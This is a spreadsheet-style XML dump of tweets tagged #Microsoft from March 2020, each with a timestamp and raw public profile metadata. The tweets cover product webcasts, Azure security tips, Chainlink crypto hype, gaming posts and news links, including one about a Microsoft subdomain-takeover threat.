'https://pbs.twimg.com/profile_banners/77639094/1360968993',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</si>
  <si>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21:43:36 +0000 2020</t>
  </si>
  <si>
    <t>!!!! W A N T E D !!!!
Looking for some more brave rookies shorting $link to get rekt. 
Please share your printscreen and get the chance to get liquidated sonner than you can sell your car. Be smart. Long @chainlink 
#chanlink #swift #microsoft #eth 
#neversell #1000keoy</t>
  </si>
  <si>
    <t>{'id': 14518541, 'id_str': '14518541', 'name': 'Cryptobowhead ðŸ˜Ž', 'screen_name': 'Cryptobowhead', 'location': '', 'description': 'Investor &amp; Trader $Link', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 237, 'friends_count': 680, 'listed_count': 1, 'created_at': 'Thu Apr 24 22:01:59 +0000 2008', 'favourites_count': 3771, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1426,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'http://pbs.twimg.com/profile_images/1231376097612386317/t0D_GF6w_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231376097612386317/t0D_GF6w_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14518541/1515434610',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</si>
  <si>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21:42:35 +0000 2020</t>
  </si>
  <si>
    <t>Join us for this upcoming webcast at 12 noon est March 16th on "Situational Response Management and Communications with Microsoft 365" #microsoft #Microsoft365 https://t.co/S5Bfv0BxXT #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 21:40:55 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/PJlEUf5DYf</t>
  </si>
  <si>
    <t>Wed Mar 04 21:40:32 +0000 2020</t>
  </si>
  <si>
    <t>How To Connect Azure Security Center To Azure Sentinel And Investigate An Alert #Microsoft #Security #Azure #AzureSecurityCenter #AzureSentinel #CloudSecurity #SIEM https://t.co/0ncKPgw59M</t>
  </si>
  <si>
    <t>{'id': 18913850, 'id_str': '18913850', 'name': 'bartvvugt', 'screen_name': 'bartvvugt', 'location': 'Belgium', 'description': 'Enterprise / Solutions Architect with focus on Cloud, Digital Workplace, Mobility, Security - Architecture', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 538, 'friends_count': 1070, 'listed_count': 19, 'created_at': 'Mon Jan 12 20:24:07 +0000 2009', 'favourites_count': 1255, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6262,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'http://pbs.twimg.com/profile_images/697024997966139392/j9AcnfeY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/697024997966139392/j9AcnfeY_normal.png',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</si>
  <si>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21:40:18 +0000 2020</t>
  </si>
  <si>
    <t>New post on upcoming webcast - Situational Response Management and Communications with Microsoft 365 - Webcast https://t.co/4GfdHOq2JE #microsoft #microsoftteams #sharepoint #yammer #microsoftstream #powerplatform</t>
  </si>
  <si>
    <t>Wed Mar 04 21:36:48 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT breaks back above 50-day moving average: https://t.co/oZ0SkrvsRL
Sentiment: Neutral #MSFT #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 21:36:29 +0000 2020</t>
  </si>
  <si>
    <t>Update to the Microsoft Authenticator app now rolling out - #Microsoft #Security #Identity  https://t.co/wFLn6JLHLl</t>
  </si>
  <si>
    <t>Wed Mar 04 21:35:04 +0000 2020</t>
  </si>
  <si>
    <t>How to use Microsoft WVD, Windows 10 multi-session, FSLogix,  https://t.co/NX9JX3B63I #Microsoft #WVD #FSLogix</t>
  </si>
  <si>
    <t>Wed Mar 04 21:33:32 +0000 2020</t>
  </si>
  <si>
    <t>High level Business Requirements Document https://t.co/styPooJRMc
#microsoft #docs #document #template #excel #word #uk #office #easy #download #simple #business #startups #sales #earn #picture</t>
  </si>
  <si>
    <t>{'id': 228188556, 'id_str': '228188556', 'name': 'Fola Baje', 'screen_name': 'flobajo100', 'location': 'London', 'description': '9 -5 , 40 for 40 guy with an interest in anything #motorsport #F1 fanatic', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 91, 'listed_count': 5, 'created_at': 'Sun Dec 19 00:26:08 +0000 2010', 'favourites_count': 294, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1627,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'http://pbs.twimg.com/profile_images/1014176499241574401/FrEo-Ncx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1014176499241574401/FrEo-Ncx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/228188556/1413752396',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'regular'}</t>
  </si>
  <si>
    <t>Wed Mar 04 21:32:35 +0000 2020</t>
  </si>
  <si>
    <t>How Microsoft 365 uses AI to stop data leaks &amp;amp; insider attacks #Microsoft #Security #M365 https://t.co/VP008EzfeX</t>
  </si>
  <si>
    <t>Wed Mar 04 21:30:59 +0000 2020</t>
  </si>
  <si>
    <t>Join me on this week's show as I chat with @jabenedicic &amp;amp; @mcbride_ruairi at #Microsoft Ignite about modernization what it means, its impact on applications, datacenters and work practices and the kind of modernising tech Microsoft have 
 https://t.co/ggz1FDLtnw</t>
  </si>
  <si>
    <t>Wed Mar 04 21:30:08 +0000 2020</t>
  </si>
  <si>
    <t>On Demand Migration (ODM) - Learn How to configure Switch Mailboxes https://t.co/wT7dQgkoFu #Migration #Microsoft #Exchange #Office365 #Mailbox https://t.co/4R0cpdzS9n</t>
  </si>
  <si>
    <t>{'id': 766031771792179201, 'id_str': '766031771792179201', 'name': 'Quest - Support', 'screen_name': 'QuestExperts', 'location': 'Aliso Viejo, CA', 'description': 'Questâ€™s Social Media Tech Support Expert global team. Ready to assist you in your quick support questions or issues. Skip the lines! we are here for you', 'url': 'https://t.co/rAjN6ozDbE', 'entities': {'url': {'urls': [{'url': 'https://t.co/rAjN6ozDbE', 'expanded_url': 'https://support.quest.com/', 'display_url': 'support.quest.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 793, 'friends_count': 376, 'listed_count': 33, 'created_at': 'Wed Aug 17 21:59:41 +0000 2016', 'favourites_count': 246, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7129,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'http://pbs.twimg.com/profile_images/809090786331500544/BHr2pxNB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/809090786331500544/BHr2pxNB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/766031771792179201/1477980179',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</si>
  <si>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21:25:20 +0000 2020</t>
  </si>
  <si>
    <t>In this webcast, #IoT experts from #PTC, Microsoft, and IDC will discuss how to face struggles that impede time to value when implementing IoT #technology... Webcast is March 19th. Register today!
https://t.co/QXOFlj5Mwd
#Microsoft #IDC #manufacturing #productdevelopment https://t.co/1p93qxAq97</t>
  </si>
  <si>
    <t>{'id': 34640961, 'id_str': '34640961', 'name': 'EAC Prod. Dev. Sol.', 'screen_name': 'EACPDS', 'location': 'HQ - Minneapolis, MN', 'description': 'EAC Product Development Solutions is a full service resource for the engineering, design, and manufacturing industries. ProENGINEER - Creo - Windchill - Mathcad', 'url': 'https://t.co/p8l3fIPc3l', 'entities': {'url': {'urls': [{'url': 'https://t.co/p8l3fIPc3l', 'expanded_url': 'https://eacpds.com', 'display_url': 'eacpds.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 475, 'friends_count': 173, 'listed_count': 53, 'created_at': 'Thu Apr 23 15:29:22 +0000 2009', 'favourites_count': 120, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5779, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '5F6062', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/693093455724048385/_jP5TKaR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/693093455724048385/_jP5TKaR_normal.png', 'profile_link_color': '549FD1', 'profile_sidebar_border_color': '1C75B0', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 21:25:14 +0000 2020</t>
  </si>
  <si>
    <t>And this is the process : 
#AI + #AR
#ArtificialIntelligence #machinelearning #augmentedreality #digitalart #cryptoart #eth #ethereum #blockchain #nft #aiart #painting #illustration @makersplaceco #Crypto #exclusive #google #facebook #nvidia #amazon #microsoft #beautiful #Tbt https://t.co/hH5kk6jn9C</t>
  </si>
  <si>
    <t>{'id': 154884299, 'id_str': '154884299', 'name': 'Fabin Rasheed ðŸ¥', 'screen_name': 'fabinrasheed', 'location': '', 'description': 'Designer | Creative Technologist | Inventor | Artist | Ex-Adobe | Ex-Xerox\n| Creative tools, #AR, #VR, #AI\n| Philosophically inclined | Knows nothing.', 'url': 'https://t.co/GDPJ28Kn8q', 'entities': {'url': {'urls': [{'url': 'https://t.co/GDPJ28Kn8q', 'expanded_url': 'http://www.nurecas.com', 'display_url': 'nurecas.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 735, 'friends_count': 952, 'listed_count': 28, 'created_at': 'Sat Jun 12 13:41:09 +0000 2010', 'favourites_count': 2368, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1077,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'http://pbs.twimg.com/profile_images/1210424807520518145/w1FHzfHr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210424807520518145/w1FHzfHr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/154884299/1583186196', 'profile_link_color': 'FA7268', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FF1212', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 21:24:36 +0000 2020</t>
  </si>
  <si>
    <t>My pants could fall for you #Carrollton  #today #microsoft https://t.co/hlwFnjB959</t>
  </si>
  <si>
    <t>{'id': 1235159938600701952, 'id_str': '1235159938600701952', 'name': 'Jenn Dorsey', 'screen_name': 'viobenethu', 'location': 'Columbia, USA', 'description': 'Love is the answer, and you know that for sure', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Wed Mar 04 11:07:38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'http://pbs.twimg.com/profile_images/1235163717073072130/_PyJCRyC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235163717073072130/_PyJCRyC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235159938600701952/1583320989',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</si>
  <si>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21:22:49 +0000 2020</t>
  </si>
  <si>
    <t>@ChainLinkGod @jwolpert Whats even better and also heavily overlooked, 4/5 biggest Cloud Giants have been involved with Chainlink as Oracle solution or member of one or more of these consortiums. Four out of five. #Google, #Oracle, #AWS, #Microsoft. This is insane</t>
  </si>
  <si>
    <t>{'id': 927166390892662784, 'id_str': '927166390892662784', 'name': 'Timo Harings', 'screen_name': 'DLTPandu', 'location': 'Deutschland, Berlin', 'description': 'All-in on Chainlink since before 20 cents. People of 2023: "You got lucky"', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2837, 'friends_count': 658, 'listed_count': 21, 'created_at': 'Sun Nov 05 13:31:08 +0000 2017', 'favourites_count': 1555, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1433,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'http://pbs.twimg.com/profile_images/1189481003888402432/wCSpu2Ks_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189481003888402432/wCSpu2Ks_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/927166390892662784/1578025601',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</si>
  <si>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21:21:44 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #cloud  #nonprofit     Your nonprofit staff needs freedom &amp;amp; mobility to work whenever, wherever. Download Mobilize your nonprofit organization, by @msftnonprofits, to see how your employees can have flexible, secure access to data &amp;amp; apps. https://t.co/lHnNYfrqhz</t>
  </si>
  <si>
    <t>Wed Mar 04 21:21:43 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft is on #opensource roll with #crossplatform #PowerShell7 
Open source, cross-platform and people seem to like it: PowerShell 7 has landed  The Register https://t.co/xxjlJyVE27</t>
  </si>
  <si>
    <t>{'id': 34356634, 'id_str': '34356634', 'name': 'Michael R Blevins', 'screen_name': 'RunnX', 'location': 'Ohio', 'description': 'Principal Engineer/Enterprise Cloud Architect â€¢ CloudSDK/Azure DevOps/Developer Enablement â€¢ #Employee @ UHG/Optum since 2007. Views expressed are my own.', 'url': 'http://t.co/NCl1jF17AT', 'entities': {'url': {'urls': [{'url': 'http://t.co/NCl1jF17AT', 'expanded_url': 'http://www.runnx.com/', 'display_url': 'runnx.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 69, 'friends_count': 71, 'listed_count': 1, 'created_at': 'Wed Apr 22 18:42:43 +0000 2009', 'favourites_count': 99, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 490,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'http://pbs.twimg.com/profile_images/586226728558702593/qAscSLGZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/586226728558702593/qAscSLGZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34356634/1558464617',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</si>
  <si>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Wed Mar 04 21:21:27 +0000 2020</t>
  </si>
  <si>
    <t>This game is too much fun, specially when you gather a larger than normal crew to get some voyages done. #rare #seapfthieves #xbox #microsoft #pirate #gaming #fun @ Tucson, Arizona https://t.co/72XheDf4x7</t>
  </si>
  <si>
    <t>{'id': 74244705, 'id_str': '74244705', 'name': 'Abraham Lemas', 'screen_name': 'NewKindofHero06', 'location': 'Nogales, Az', 'description': 'HorrorðŸ”ª | GamesðŸŽ® | MoviesðŸŽ¬ | MusicðŸŽ§ |\nBooksðŸ“š', 'url': 'https://t.co/kEZaHjf0Dh', 'entities': {'url': {'urls': [{'url': 'https://t.co/kEZaHjf0Dh', 'expanded_url': 'http://www.mixer.com/newkindofhero06', 'display_url': 'mixer.com/newkindofhero06', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 153, 'friends_count': 457, 'listed_count': 9, 'created_at': 'Mon Sep 14 19:50:31 +0000 2009', 'favourites_count': 3970, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8816,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'http://pbs.twimg.com/profile_images/1062048005644201985/A-rvP7-P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1062048005644201985/A-rvP7-P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/74244705/1548447567', 'profile_link_color': '030001',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</si>
  <si>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Mar 04 21:21:07 +0000 2020</t>
  </si>
  <si>
    <t>New threat alert: #Microsoft subdomain takeover. 
Heres everything you need to know to stay protected.
https://t.co/iZvwnX0wXr
#CloudSecurity #EmailSecurity #informationsecurity</t>
  </si>
  <si>
    <t>{'id': 3031317826, 'id_str': '3031317826', 'name': 'GreatHorn Inc.', 'screen_name': 'greathorn', 'location': 'Boston, MA', 'description': 'GreatHorn provides cloud native email security for enterprises running on cloud email platforms.', 'url': 'http://t.co/5Gfq2YhjMU', 'entities': {'url': {'urls': [{'url': 'http://t.co/5Gfq2YhjMU', 'expanded_url': 'http://www.greathorn.com', 'display_url': 'greathorn.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 795, 'friends_count': 821, 'listed_count': 73, 'created_at': 'Wed Feb 11 21:04:26 +0000 2015', 'favourites_count': 200, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1419,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'http://pbs.twimg.com/profile_images/1217869787965153287/O6CukmfY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217869787965153287/O6CukmfY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3031317826/1579197760', 'profile_link_color': '2E2E2E',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</si>
  <si>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21:20:45 +0000 2020</t>
  </si>
  <si>
    <t>Im backkkk!!! Had my beautiful baby girl 13 days ago so I havent been on. But its go time!
https://t.co/UHBvGZ2IWR
#CALLOFDUTY #MODERN #WARFARE #shoothouse #STREAMING  #LEGIT #X3LITEXROGUEX #F4F #SHOOTTHESHIP #xbox #xboxone #gamer #microsoft #Shipment #guesswhosback #GETATME</t>
  </si>
  <si>
    <t>{'id': 989644842, 'id_str': '989644842', 'name': 'Dell Husser', 'screen_name': 'DellHusser1295', 'location': '', 'description': 'I use Twitter mainly for gaming/ stream posting. I stream @ https://t.co/lDXPchpaEt usually COD:MW but am down to play pretty much whatever!', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/lDXPchpaEt', 'expanded_url': 'http://mixer.com/X3liteXrogueX', 'display_url': 'mixer.com/X3liteXrogueX', 'indices': [60, 83]}]}}, 'protected': False, 'followers_count': 82, 'friends_count': 602, 'listed_count': 0, 'created_at': 'Tue Dec 04 21:49:31 +0000 2012', 'favourites_count': 215, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 396,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'http://pbs.twimg.com/profile_images/1050001016932982784/--d48w_y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1050001016932982784/--d48w_y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/989644842/1580267242',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</si>
  <si>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21:20:25 +0000 2020</t>
  </si>
  <si>
    <t>STEAL: Red Dead Redemption 2 - Xbox One [Digital Code]
Original: $59.99
Sale: $29.99
BUY HERE: https://t.co/zzkwjYqdid
#Gaming #Xbox #RDR2 #RockstarGames #Deals #Microsoft https://t.co/NQas8MU7El</t>
  </si>
  <si>
    <t>{'id': 1231997538640764933, 'id_str': '1231997538640764933', 'name': 'Gaming Deals', 'screen_name': 'Gaming_Deals_', 'location': 'United States', 'description': 'Showcasing the top deals for gamers - PC, Xbox, PlayStation, and Nintendo - Games, Consoles, Accessories, and Monitors - Free giveaways every 1000 followers SEO', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Mon Feb 24 17:41:24 +0000 2020', 'favourites_count': 7,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'http://pbs.twimg.com/profile_images/1233083647684677639/BG9YfirB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233083647684677639/BG9YfirB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1231997538640764933/1583273663',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</si>
  <si>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21:18:38 +0000 2020</t>
  </si>
  <si>
    <t>@gingertedwards Well, at least #Microsoft isn't stealing all your data like with Windows 10.</t>
  </si>
  <si>
    <t>{'id': 993599907981213696, 'id_str': '993599907981213696', 'name': 'ðŸ’§Michael Reid', 'screen_name': 'michael_reid_IT', 'location': 'Australian Capital Territory', 'description': 'Overwhelmed by Climate Change. Inspired by @gretathunberg and @aoc. Obsessed with sustainability. Multipotentialite. Furious with rorting, self serving govt.', 'url': 'https://t.co/mAJb1WRjfK', 'entities': {'url': {'urls': [{'url': 'https://t.co/mAJb1WRjfK', 'expanded_url': 'http://www.blueblood.com.au', 'display_url': 'blueblood.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 380, 'friends_count': 675, 'listed_count': 1, 'created_at': 'Mon May 07 21:14:13 +0000 2018', 'favourites_count': 8742, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6160, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176435963351846912/Pdn73BNi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176435963351846912/Pdn73BNi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/993599907981213696/1544430075',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</si>
  <si>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21:15:56 +0000 2020</t>
  </si>
  <si>
    <t>No more #Facebook App for windows, no more click on the tile, you now how to sign in using your browser, thanks #Microsoft</t>
  </si>
  <si>
    <t>{'id': 118816307, 'id_str': '118816307', 'name': 'Andreas Anderson', 'screen_name': 'TopDrawWebsites', 'location': 'Blackpool, Lancs', 'description': 'Established in 2008 hoping to share interesting links and info on all aspects of life on the www.', 'url': 'https://t.co/XLkPVarEif', 'entities': {'url': {'urls': [{'url': 'https://t.co/XLkPVarEif', 'expanded_url': 'http://www.topdrawwebdesign.uk', 'display_url': 'topdrawwebdesign.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 41, 'friends_count': 149, 'listed_count': 0, 'created_at': 'Mon Mar 01 20:52:22 +0000 2010', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 161, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D2FAD5', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/923121133687332869/FIBnCW6S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/923121133687332869/FIBnCW6S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/118816307/1550686529', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': 'FFA012', 'profile_sidebar_fill_color': 'FEFFDB', 'profile_text_color': '350066', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 21:12:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Nightmare Login Hack: This New Video Shows How Your Password Can Now Be Stolen https://t.co/AtOAXonoon users visiting a genuine #Microsoft web domain might actually be on a subdomain controlled by an #attacker. #ITSecurity #Windows10 #Hacked #Hacking #passwords</t>
  </si>
  <si>
    <t>Wed Mar 04 21:11:24 +0000 2020</t>
  </si>
  <si>
    <t>Moo's News 3 4 2020 #HTC #blockchain Router, BASELINE = $LINK, EY, #Microsoft https://t.co/dw0CBYloNW via @YouTube #5G</t>
  </si>
  <si>
    <t>{'id': 486044893, 'id_str': '486044893', 'name': 'Warren Young', 'screen_name': 'DJWarrenYoung', 'location': 'Orlando, FL', 'description': "I #DJ, play the piano, I'm a drummer, life is #syncopated I get along with #Jitter and my natural talent is using #chopsticks IG: DJRT https://t.co/aDXMLJREMu", 'url': 'https://t.co/7u4NKjKKWK', 'entities': {'url': {'urls': [{'url': 'https://t.co/7u4NKjKKWK', 'expanded_url': 'http://soundcloud.com/warrenyoung', 'display_url': 'soundcloud.com/warrenyoung', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/aDXMLJREMu', 'expanded_url': 'http://facebook.com/warrinwarren', 'display_url': 'facebook.com/warrinwarren', 'indices': [135, 158]}]}}, 'protected': False, 'followers_count': 28086, 'friends_count': 23186, 'listed_count': 4148, 'created_at': 'Tue Feb 07 21:23:53 +0000 2012', 'favourites_count': 429028, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 309833,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'http://pbs.twimg.com/profile_images/893131363221610496/Ny9S0Pda_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/893131363221610496/Ny9S0Pda_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/486044893/1500009997',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</si>
  <si>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21:07:33 +0000 2020</t>
  </si>
  <si>
    <t>Octopus
Built for #Microsoft co-founder Paul Allen.
He died in 2018; his estate listed the yacht for sale
https://t.co/HfCjPEAAc1
 Raphael Belly
#superyachtfan #superyacht #octopus #megayacht #luxuryyacht #lurssen #octopusyacht #billionairetoys #superyachtforsale #forsale https://t.co/WC5sw0vINx</t>
  </si>
  <si>
    <t>{'id': 1274686292, 'id_str': '1274686292', 'name': 'SuperYachtFan', 'screen_name': 'Superyachtfan', 'location': 'United States', 'description': 'SuperYachtFan, about superyachts and superyacht owners.', 'url': 'http://t.co/cO5qy5oP9l', 'entities': {'url': {'urls': [{'url': 'http://t.co/cO5qy5oP9l', 'expanded_url': 'http://www.superyachtfan.com', 'display_url': 'superyachtfan.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2983, 'friends_count': 701, 'listed_count': 35, 'created_at': 'Sun Mar 17 10:58:14 +0000 2013', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1673,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'http://pbs.twimg.com/profile_images/1061508602790322176/ierzRuMJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1061508602790322176/ierzRuMJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1274686292/1553596534',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</si>
  <si>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21:04:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #365Business helps manufacturers digitally transform to empower teams to work faster and better together. Watch video for inspiration &amp;amp; start your transformation with JCMR Technology. https://t.co/lThI10ST3L</t>
  </si>
  <si>
    <t>{'id': 234907630, 'id_str': '234907630', 'name': 'JCMR Technology', 'screen_name': 'jcmrtechnology', 'location': 'Charlotte NC', 'description': '', 'url': 'http://t.co/yQTcWk5D2X', 'entities': {'url': {'urls': [{'url': 'http://t.co/yQTcWk5D2X', 'expanded_url': 'http://www.jcmr.net', 'display_url': 'jcmr.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 141, 'listed_count': 8, 'created_at': 'Thu Jan 06 21:41:15 +0000 2011', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1916,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'http://pbs.twimg.com/profile_images/3134387907/def599c2e9f40728953a39fdf6fb04cc_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3134387907/def599c2e9f40728953a39fdf6fb04cc_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/234907630/1358696011',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</si>
  <si>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21:03:19 +0000 2020</t>
  </si>
  <si>
    <t>Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains:    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/64Yq2zGpYm</t>
  </si>
  <si>
    <t>{'id': 30009391, 'id_str': '30009391', 'name': 'John McClure', 'screen_name': 'johnfmcclure', 'location': 'Denver, CO', 'description': 'Tech Exec of a leading Microsoft Partner in the Denver Metro area', 'url': 'http://t.co/lbv8tJglA4', 'entities': {'url': {'urls': [{'url': 'http://t.co/lbv8tJglA4', 'expanded_url': 'http://www.beinventiv.com/blog', 'display_url': 'beinventiv.com/blog', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 66, 'listed_count': 2, 'created_at': 'Thu Apr 09 15:57:06 +0000 2009', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 218,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'http://pbs.twimg.com/profile_images/378800000459831058/3269f95252b2855070e48be29ff02db6_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000459831058/3269f95252b2855070e48be29ff02db6_normal.jpeg', 'profile_link_color': '919191',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</si>
  <si>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Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains:    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/vcFIyFyI4s</t>
  </si>
  <si>
    <t>{'id': 1684961978, 'id_str': '1684961978', 'name': 'BeiNVENTiV ', 'screen_name': 'beiNVENTiV', 'location': 'Louisville, CO', 'description': 'beiNVENTiV delivers Outsourced IT, IT assistance, custom development &amp; private equity solutions.  We have deep expertise with Office 365, Cloud and CRM!', 'url': 'http://t.co/QI8QVEDrRL', 'entities': {'url': {'urls': [{'url': 'http://t.co/QI8QVEDrRL', 'expanded_url': 'http://www.beiNVENTiV.com', 'display_url': 'beiNVENTiV.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 182, 'listed_count': 0, 'created_at': 'Tue Aug 20 05:37:14 +0000 2013', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 141,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'http://pbs.twimg.com/profile_images/378800000337631281/dfe00ef8cca1b79f93478e5dd258ba84_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000337631281/dfe00ef8cca1b79f93478e5dd258ba84_normal.jpeg',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</si>
  <si>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Wed Mar 04 21:00:49 +0000 2020</t>
  </si>
  <si>
